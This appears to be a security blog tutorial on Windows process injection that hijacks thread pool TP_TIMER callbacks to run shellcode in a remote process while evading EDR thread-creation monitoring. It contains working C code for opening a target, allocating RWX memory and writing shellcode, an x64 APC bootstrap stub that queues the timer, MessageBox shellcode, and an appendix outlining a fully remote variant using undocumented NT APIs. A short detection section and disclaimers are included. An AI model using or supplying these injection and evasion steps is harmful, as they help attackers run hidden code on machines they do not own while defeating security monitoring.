Modern endpoint detection systems monitor for direct thread creation via APIs like CreateRemoteThread, flagging new threads as potential injection attempts. That makes classic injection noisy and easily caught in process audits or behavioral analytics.

This post demonstrates an alternative: hijacking the Windows thread pool’s timer callbacks (TP_TIMER) to execute shellcode in a remote process. The code runs as a legitimate asynchronous callback, blending into the system’s normal activity.

Shoutout to Alon Leviev of SafeBreach for the original PoolParty research.


The detection problem

EDRs and security tools often hook or monitor thread pool APIs indirectly, but they rarely flag callbacks fired by kernel-scheduled timers. Traditional injection creates visible threads; TP_TIMER abuse schedules execution through the pool’s existing machinery, avoiding explicit thread starts.

// Classic approach - easily flagged
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcodeAddr, NULL, 0, NULL);

With TP_TIMER, no new thread handle appears in tools like Process Explorer or via thread enumeration APIs. The pool worker invokes your code as just another callback.


The TP_TIMER approach

Windows thread pools manage timers via TP_TIMER objects, which trigger user-defined callbacks when due. The callbacks run on pool worker threads inside the target process, dispatched when the kernel signals timer expiration.

The key: remotely queue a timer whose callback points directly to injected shellcode. When the timer fires, the pool dispatches your payload as a standard PTP_TIMER_CALLBACK, without user-mode thread creation.

Why it works:

  • Execution happens via kernel-managed callbacks, not explicit threads.
  • No CreateRemoteThread call enters API monitors or ETW traces.
  • Blends with legitimate async operations like file I/O timers or network events.
  • Evades heuristics focused on thread start addresses or creation patterns.

Windows thread pool internals

Thread pools centralize async work on Windows, with TP_TIMER handling periodic or one-shot callbacks. Internally:

  • Each timer object stores a callback pointer (PTP_TIMER_CALLBACK) and period/due time.
  • The kernel queues timers to the pool; workers invoke callbacks in process context.
  • Callbacks use the Microsoft x64 calling convention (not stdcall, which only applies on x86): VOID CALLBACK TimerCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_TIMER Timer).

The abuse: allocate shellcode that matches this signature, then register it as a timer callback inside the target process.

PTP_TIMER hTimer = CreateThreadpoolTimer(TimerCallback, Context, NULL);
FILETIME dueTime = {0};  // Fire immediately
SetThreadpoolTimer(hTimer, &dueTime, 0, 0);

Here, TimerCallback is your shellcode address. The pool handles invocation without user intervention.
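One nuance the zeroed FILETIME glosses over: SetThreadpoolTimer interprets a negative 64-bit due time as an interval relative to now, expressed in 100-nanosecond units. A portable sketch of the millisecond conversion (FILETIME modeled here as two plain 32-bit fields; the type and function names are illustrative, not Windows APIs):

```c
#include <stdint.h>

/* Model of the FILETIME split consumed by SetThreadpoolTimer:
   a negative 64-bit value means "relative to now", in 100-ns units. */
typedef struct {
    uint32_t dwLowDateTime;
    uint32_t dwHighDateTime;
} FileTimeParts;

static FileTimeParts relative_due_time_ms(uint32_t ms) {
    int64_t hundred_ns = -(int64_t)ms * 10000;   /* 1 ms = 10,000 * 100 ns */
    uint64_t raw = (uint64_t)hundred_ns;         /* two's-complement bits  */
    FileTimeParts ft;
    ft.dwLowDateTime  = (uint32_t)(raw & 0xFFFFFFFFu);
    ft.dwHighDateTime = (uint32_t)(raw >> 32);
    return ft;
}
```

A zeroed FILETIME, as in the snippet above, is an absolute time in the distant past, so it also fires immediately.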


Step-by-step implementation

This example outlines the injection flow: allocate shellcode in the target, establish remote execution to queue the timer, and let the system fire it. Assumes x64 Windows; adjust for 32-bit.

Note: Code presented for authorized security research and educational use only. Test in isolated VMs.

1. Open target and allocate memory

Gain access and prepare RWX space for shellcode.

#include <windows.h>
#include <stdio.h>

HANDLE hProcess = OpenProcess(
    PROCESS_ALL_ACCESS, FALSE, targetPid
);

if (!hProcess) {
    printf("[!] Failed to open process: %lu\n", GetLastError());
    return 1;
}

SIZE_T shellcodeSize = sizeof(shellcode);  // Your payload bytes
LPVOID remoteShellcode = VirtualAllocEx(
    hProcess, NULL, shellcodeSize,
    MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE
);

if (!remoteShellcode) {
    printf("[!] VirtualAllocEx failed: %lu\n", GetLastError());
    CloseHandle(hProcess);
    return 1;
}

// Write shellcode
SIZE_T bytesWritten;
BOOL success = WriteProcessMemory(
    hProcess, remoteShellcode, shellcode, shellcodeSize, &bytesWritten
);

if (!success || bytesWritten != shellcodeSize) {
    printf("[!] WriteProcessMemory failed\n");
    VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
    CloseHandle(hProcess);
    return 1;
}

printf("[+] Shellcode allocated and written at 0x%p\n", remoteShellcode);

This plants the payload. Shellcode must conform to PTP_TIMER_CALLBACK: ignore params, perform actions, exit cleanly.

2. Queue the remote timer

Creating the TP_TIMER directly from the injector fails: the thread pool APIs operate on the calling process's own pool. Use a bootstrap primitive (e.g., NtQueueApcThread or QueueUserAPC against an existing thread) to run a small stub in the target that queues the timer.

Stub payload (remote-executed first):

; Stub to queue the timer - small, position-independent. Note: MSVC does
; not support inline assembly on x64, so a real stub is assembled
; separately (ml64/nasm) and injected as raw bytes.

QueueTimerStub:
    sub  rsp, 28h                 ; shadow space + 16-byte alignment
    ; resolve CreateThreadpoolTimer / SetThreadpoolTimer from kernel32's
    ; export table via name hashing (no imports in position-independent code)
    ; ...
    mov  rcx, remoteShellcode     ; callback = shellcode address (patched in)
    xor  rdx, rdx                 ; context = NULL
    xor  r8, r8                   ; callback environment = NULL
    call CreateThreadpoolTimer    ; returns PTP_TIMER in rax
    mov  rcx, rax                 ; timer handle
    lea  rdx, [dueTime]           ; zeroed FILETIME -> fire immediately
    xor  r8d, r8d                 ; period = 0 (one-shot)
    xor  r9d, r9d                 ; window length = 0
    call SetThreadpoolTimer
    add  rsp, 28h
    ret

Inject and execute the stub via APC or similar. Once run, it queues the timer pointing to your main shellcode.
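The hash-based export resolution the stub relies on is typically a rolling rotate-and-add over each export name, compared against a precomputed constant. A minimal, portable sketch (ROR-13 is a common but arbitrary choice; the function names here are illustrative):

```c
#include <stdint.h>

/* Rotate a 32-bit value right by n bits (0 < n < 32). */
static uint32_t ror32(uint32_t v, unsigned n) {
    return (v >> n) | (v << (32 - n));
}

/* ROR-13 hash over an export name, as used by position-independent
   shellcode to locate APIs without importing GetProcAddress. */
static uint32_t api_hash(const char *name) {
    uint32_t h = 0;
    for (; *name; ++name)
        h = ror32(h, 13) + (uint8_t)*name;
    return h;
}
```

At runtime the stub walks the module's export directory, hashes each name, and compares against constants baked into the stub, so no API-name strings appear in the payload.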

3. Execution and cleanup

The kernel fires the timer shortly after queuing. Your shellcode executes in a pool worker thread—perform actions like spawning processes or loading DLLs.

Wait via injector (optional):

// From injector: wait a beat for callback
Sleep(100);  // Tune based on due time

// Free only after the callback has finished; releasing the page early crashes the target
VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
CloseHandle(hProcess);

printf("[+] Injection complete - check target for execution\n");

A full demo would include the stub-injection details; the focus here is the TP_TIMER pivot.


Callback requirements

Shellcode must match PTP_TIMER_CALLBACK:

  • Signature: VOID (PTP_CALLBACK_INSTANCE, PVOID, PTP_TIMER)
  • Convention: Microsoft x64 (rcx=instance, rdx=context, r8=timer)
  • No return value; clean stack.

Simple MessageBox shellcode example:

; Assembly snippet - assemble to bytes (x64: MessageBoxA needs
; shadow space and 16-byte stack alignment at the call)
xor  r9, r9            ; uType = MB_OK
sub  rsp, 28h          ; shadow space + alignment
lea  r8,  [strTitle]   ; "Injected"
lea  rdx, [strText]    ; "TP_TIMER works!"
xor  rcx, rcx          ; hWnd = NULL
call MessageBoxA
add  rsp, 28h
ret

// Strings and hModule resolved at runtime or baked in
BYTE shellcode[] = { 0x4D, 0x31, 0xC9, /* ... full bytes ... */ };

Test locally first: compile as DLL, export callback, queue timer.


Considerations

This bypasses thread-creation monitors but not all defenses.

  • Strengths: No thread handles; low API footprint post-bootstrap.
  • Weaknesses: Requires initial remote exec; pool callbacks loggable via advanced tracing.
  • Detection notes: Hook CreateThreadpoolTimer/SetThreadpoolTimer; scan callback addrs for anomalies.

In short: evasion of one heuristic does not equal invisibility.


Disclaimer: Intended for authorized security research and educational purposes only.


Appendix

Internals—NTAPI, Object Handles, and True “No-Primitive” Threadpool Timer Injection

For technically advanced readers interested in the deeper form of TP_TIMER abuse—fully remote injection with no bootstrap primitive or shellcode runner thread—here’s a glimpse “under the hood”.

Direct Manipulation of Threadpool Timer Objects

While userland APIs like CreateThreadpoolTimer or even classic APC stub runners require code execution in the target, it’s possible to remotely schedule arbitrary callback execution purely by manipulating the target’s threadpool objects and using low-level Windows NT APIs:

  • Object Enumeration:
    The injector identifies and duplicates (via DuplicateHandle, NtQueryInformationProcess, NtQueryObject) existing object handles of type:
    • "Process" (code/data access)
    • "TpWorkerFactory" (thread pool worker factory)
    • "IRTimer" (internal timer objects)
  • Threadpool Structures:
    Using internal layout knowledge (reverse engineered from Windows symbols), a complete FULL_TP_TIMER structure is created locally with the callback pointer set to the desired shellcode and then allocated and written into the remote process via VirtualAllocEx and WriteProcessMemory.

  • Linking with the Worker Pool:
    The structure’s pool pointer is rebased to the factory’s actual pool address obtained through NtQueryInformationWorkerFactory.

  • Queue Links and Timer Trees:
    The timer’s start/end links are patched into the remote process’s timer queue (writing pointer fixes via WriteProcessMemory).

  • Remote Kernel Signaling:
    Finally, the payload is dispatched by calling: NtSetTimer2(hTimerQ, &due_time, NULL, &params); This NTAPI call schedules the crafted timer object for execution, causing the system threadpool to invoke your payload asynchronously—without any explicit thread creation or stub execution in userland.

No Userland Primitive—What’s the Catch?

  • This approach requires deep knowledge of Windows internal structures (undocumented in the public API).
  • It is inherently version-dependent: changes in struct layouts or access policies on future Windows builds could break the method.
  • All actions are performed remotely from the injector, and no shellcode runner or code stub is needed in the target except for the payload itself.
  • This avenue does still leave (advanced) forensic artifacts: manipulated timer lists, irregular or malicious callback addresses within the pool, and potential log entries if kernel debug instrumentation is present.